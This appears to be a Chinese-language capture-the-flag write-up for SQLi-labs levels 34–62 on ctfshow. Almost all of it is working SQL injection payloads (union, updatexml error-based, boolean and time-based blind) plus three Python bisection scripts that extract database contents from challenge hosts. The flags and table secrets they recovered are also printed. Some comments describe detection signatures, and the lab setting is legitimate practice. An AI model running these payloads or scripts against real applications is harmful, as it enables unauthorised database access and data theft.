SQLILABS 34-61
level 34
用十六进制代替引号 " " 里的内容
1 'union select 1,group_concat(schema_name) from information_schema.schemata #
1 'union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77 #
level 35
有点直接。。。数字型注入???
?id=-1 union select 1,2,flag4s from ctfshow.flags%23
level 36
emmm
?id=-1'union select 1,2,flag4s from ctfshow.flags%23
level 37
emmm
-1'union select 1,2,flag4s from ctfshow.flags#
level 38
emmm
-1'union select 1,flag4s from ctfshow.flags#
level 39
emmm
?id=-1 union select% 1,2,flag4s from ctfshow.flags%23
level 40
盲注跑脚本就是了
import requests
import time
# Level 40 solver: boolean-based blind extraction. Each outer iteration
# recovers one character of the target value by bisecting the printable
# range 32..126; every bisection step is one HTTP request, and the oracle
# is whether the page still renders the normal "Your Username is : Dumb" row.
# Defender note: the trace this leaves is a burst of near-identical requests
# whose query string differs only in the two numbers inside
# if(ascii(substr(...))>N,...) -- a straightforward log / WAF signature.
url = "http://591c712f-cd11-4547-94e0-27df596874e3.challenge.ctf.show:8080/"
result: str = ""
for i in range(1,1290):  # i = 1-based character position; 1290 is just a generous upper bound
    head=32   # lowest candidate byte (inclusive)
    tail=127  # highest candidate byte (exclusive)
    while head<tail:
        mid=(head+tail)>>1
        # Earlier probes kept as history (schema / table / column enumeration).
        #?id=100"||if(ascii(substr((seLeCt(group_concat(schema_name))from(information_schema.schemata)),1,1))>9999,1,0)||"0
        # payload="?id=100')||if(ascii(substr((seleCt(group_concat(schema_name))from(information_schema.schemata)),{},1))>{},1,0)%23".format(i,mid)
        # payload="?id=100')||if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{},1))>{},1,0)||('0".format(i,mid)
        # payload="?id=100')||if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{},1))>{},1,0)||('0".format(i,mid)
        # Active probe: "is the byte at position i greater than mid?"
        payload="?id=1') and if(ascii(substr((seLect(flag4s)from(ctfshow.flags)),{},1))>{},1,0)%23".format(i,mid)
        # print(url+payload)
        r=requests.get(url+payload)
        if "Your Username is : Dumb" in r.text:
            head=mid+1  # normal row shown -> condition true -> byte is above mid
        else:
            tail=mid    # row absent -> byte is mid or below
    if head !=32:
        result+=chr(head)  # head converged on the byte value
    else:
        break  # head never moved off 32: treated as end of the string
print(result)
中间没改,要用的话自己改改
level 41
把上面脚本里面的 ') 去掉就行
level 42
密码处
-1’ union select 1,2,3#
-1’ union select 1,flag4s,3 from ctfshow.flags#
level 43
-1’) union select 1,2,3 #
-1’) union select 1,flag4s,3 from ctfshow.flags#
level 44
admin’ or if(ascii(substr(database(),1,1))>1,sleep(3),0) #
时间盲注,脚本改一改
level 45
admin’) or 1=1 #
admin’) or if(ascii(substr(database(),1,1))>1,sleep(3),0) #
时间盲注改一改
level 46
报错注入
1 or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
1 or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
1 or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘ctfshow’),0x26),1)#
1 or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘flags’),0x26),1)#
1 or updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)#
1 or updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)#
ctfshow{04b1482e-203c-44f1-8bb6-df5b27801821}
level 47
1’or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)%23
…
…
…
…
1’ or updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
1’ or updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
ctfshow{749b597e-5a51-495b-b92c-1a3accd21bc0}
?sort=1’or if(ascii(substr(database(),1,1))>1,sleep(0.5),0) %23
level 48
import requests
# Level 48 solver: time-based blind extraction with the same per-character
# bisection as the level 40 script. Here the oracle is a client-side timeout:
# the probe request uses timeout=0.4 s, so a server-side sleep(0.5) in the
# true branch surfaces as a requests exception.
# Defender note: each character costs ~7 requests that differ only in the two
# numbers inside if(...,sleep(0.5),0); the matching spikes in response latency
# on the server side are the other half of the signature.
url = "http://ee9f5ee9-1368-4d89-a875-1a44cfdf308e.challenge.ctf.show:8080/?sort=1 and "
result: str = ""
for i in range(1,1290):  # i = 1-based character position; 1290 is just a generous upper bound
    head=32   # lowest candidate byte (inclusive)
    tail=127  # highest candidate byte (exclusive)
    while head<tail:
        mid=(head+tail)>>1
        # Earlier probes kept as history (database / schema / table / column enumeration).
        # payload="if(ascii(substr(database(),{},1))>{},sleep(0.5),0) %23".format(i,mid)
        # payload="if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(1),0) %23".format(i,mid)
        # payload="if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(1),0) %23".format(i,mid)
        # payload="if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(1),0) %23".format(i,mid)
        # Active probe: "is the byte at position i greater than mid?" -> sleep if so.
        payload="if(ascii(substr((select flag4s from ctfshow.flags),{},1))>{},sleep(0.5),0) %23".format(i,mid)
        # print(url+payload)
        # start_time=time.time()
        # First, untimed request: its response is never inspected.
        r=requests.get(url+payload)
        print(url+payload)
        #print(r.text)
        try:
            # Timed probe: completing within 0.4 s means no sleep fired.
            r = requests.get(url+payload,timeout=0.4)
            tail = mid      # no delay -> byte is mid or below
        except:
            # Any exception (not only a timeout) is taken as "delay happened".
            head = mid + 1  # delay -> byte is above mid
    if head !=32:
        result+=chr(head)  # head converged on the byte value
    else:
        break  # head never moved off 32: treated as end of the string
print(result)
ctfshow{6d997ae2-953d-4117-8563-e426fb32bc65}
level 49
时间盲注
1’ and if(ascii(substr((seleCt(group_concat(schema_name))from(information_schema.schemata)),1,1))>2,sleep(0.5),0) %23
贴个脚本,自己改
import requests
# Level 49 solver: the level 48 time-based script pointed at the Less-49
# sort parameter (single-quoted context). One character per outer iteration,
# found by bisecting 32..126; the oracle is whether the probe request exceeds
# its 0.4 s client timeout because sleep(0.5) ran on the server.
# Defender note: the request pattern (runs of requests differing only in two
# numbers inside if(...,sleep(0.5),0)) and the correlated latency spikes are
# what a detection rule should key on.
url = "http://583bbd02-c708-41eb-86ab-f792729f9843.node4.buuoj.cn/Less-49/?sort=1' and "
result: str = ""
for i in range(1,1290):  # i = 1-based character position; 1290 is just a generous upper bound
    head=32   # lowest candidate byte (inclusive)
    tail=127  # highest candidate byte (exclusive)
    while head<tail:
        mid=(head+tail)>>1
        # Active probe: "is the byte at position i of database() greater than mid?"
        payload="if(ascii(substr(database(),{},1))>{},sleep(0.5),0) %23".format(i,mid)
        # Alternative probes kept as history (schema / table / column / flag).
        # payload="if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(1),0) %23".format(i,mid)
        # payload="if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(1),0) %23".format(i,mid)
        # payload="if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(1),0) %23".format(i,mid)
        # payload="if(ascii(substr((select flag4s from ctfshow.flags),{},1))>{},sleep(0.5),0) %23".format(i,mid)
        # print(url+payload)
        # start_time=time.time()
        # First, untimed request: its response is never inspected.
        r=requests.get(url+payload)
        print(url+payload)
        #print(r.text)
        try:
            # Timed probe: completing within 0.4 s means no sleep fired.
            r = requests.get(url+payload,timeout=0.4)
            tail = mid      # no delay -> byte is mid or below
        except:
            # Any exception (not only a timeout) is taken as "delay happened".
            head = mid + 1  # delay -> byte is above mid
    if head !=32:
        result+=chr(head)  # head converged on the byte value
    else:
        break  # head never moved off 32: treated as end of the string
print(result)
level 50
1 or updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
1 or updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
ctfshow{0f3c691a-ba65-4f5b-ad46-bc0e58100b9e}
level 51
1’or updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
1’or updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
ctfshow{23972c5c-3569-4115-8572-0f754336659a}
level 52
时间盲注
?sort=1 and if(ascii(substr((seleCt(group_concat(schema_name))from(information_schema.schemata)),1,1))>2,sleep(5),0) %23
49那个脚本改一改
level 53
时间盲注脚本跑一跑
?sort=1’ and if(ascii(substr(database(),1,1))>114,sleep(0.5),0) %23
level 54
网上没环境了
用docker搭了个环境自己做
10次机会
先写好语句
id=-1’ union select 1,group_concat(schema_name),3 from information_schema.schemata %23
id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’ %23
N4QU4VGMDT
id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘N4QU4VGMDT’ %23
secret_XA5R
?id=-1’union select 1,group_concat(secret_XA5R),3 from challenges.N4QU4VGMDT %23
level 55
?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’%23
?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘RW5TWVFDYU’%23
?id=-1) union select 1,group_concat(secret_O1KM),3 from challenges.RW5TWVFDYU%23
level 56
?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’%23
MMFDGR6C60
?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘MMFDGR6C60’%23
secret_ZGCM
?id=-1’) union select 1,group_concat(secret_ZGCM),3 from challenges.MMFDGR6C60%23
level 57
?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’%23
UCNSDJBA2P
?id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘UCNSDJBA2P’%23
secret_7COO
?id=-1" union select 1,group_concat(secret_7COO),3 from challenges.UCNSDJBA2P%23
level 58
没有回显,有报错信息
报错注入
1’ or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘challenges’),0x26),1)%23
WMYP9VS7T2
1’ or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘WMYP9VS7T2’),0x26),1)%23
secret_YKLV
1’ or updatexml(1,concat(0x26,(select right(group_concat(secret_YKLV),30) from challenges.WMYP9VS7T2),0x26),1)%23
BzE8UovoHobfXoFK5rflIeMo
level 59
?id=1 or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘challenges’),0x26),1)%23
WZBWCK0O8M
?id=1 or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘WZBWCK0O8M’),0x26),1)%23
secret_CNZ0
?id=1 or updatexml(1,concat(0x26,(select right(group_concat(secret_CNZ0),30) from challenges.WZBWCK0O8M),0x26),1)%23
JeF0NQQk0TXsVJM6MzoPbtiL
level 60
?id=1")or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘challenges’),0x26),1)%23
IYK33M1WVE
?id=1")or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘IYK33M1WVE’),0x26),1)%23
secret_WL6G
?id=1")or updatexml(1,concat(0x26,(select right(group_concat(secret_WL6G),30) from challenges.IYK33M1WVE),0x26),1)%23
f3Vhf9q9mInCQoAqyOXGCLcy
level 61
?id=1’))or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘challenges’),0x26),1)%23
UEEUBQKDFE
?id=1’))or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘UEEUBQKDFE’),0x26),1)%23
secret_RMS1
?id=1")or updatexml(1,concat(0x26,(select right(group_concat(secret_RMS1),30) from challenges.UEEUBQKDFE),0x26),1)%23
KnCHCTocAwPG2sToN2wUczxu
level 62
上脚本
S3BCU54QBK
secret_AYW3